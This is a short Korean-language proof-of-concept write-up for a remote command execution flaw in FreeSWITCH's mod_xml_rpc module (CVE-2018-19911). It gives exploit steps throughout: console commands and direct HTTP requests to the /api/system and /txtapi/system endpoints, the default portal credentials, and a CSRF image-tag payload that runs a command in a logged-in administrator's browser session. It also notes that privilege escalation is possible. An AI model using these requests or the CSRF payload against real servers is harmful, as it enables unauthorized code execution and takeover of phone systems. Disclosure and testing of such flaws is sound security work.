
freeswitch 모든 버전 원격 명령 실행 (cve-2018-19911)
버전:<=1.8.2
모듈:mod_xml_rpc
세 가지 버전을 테스트했습니다.(다운로드 URL:http://files.freeswitch.org/)
freeswitch 1.5.15 Windows 버전 설치(http://files.freeswitch.org/windows/installer/x64/freeswitch.msi)
콘솔을 열고 다음을 입력하세요: load mod_xml_rpc (freeswitch 포털 로드)
로컬 포트 8080에 접속,
http://127.0.0.1:8080/portal/index.html
콘솔에 입력
api("system calc") 또는api("bg_system calc")

인터페이스에 직접 요청할 수도 있습니다
http://127.0.0.1:8080/txtapi/system?calc 또는
http://127.0.0.1:8080/api/system?calc



freeswitch 포털의 기본 계정과 비밀번호는 freeswitch:works입니다.
직접 freeswitch_rce.py를 사용하여 확인할 수 있습니다.
또는 csrf를 사용하여 로그인한 관리자를 공격할 수 있습니다.
<img src="http://127.0.0.1:8080/api/system?calc">

freeswitch는 종종 높은 권한으로 실행되므로, 권한 상승 효과도 얻을 수 있습니다.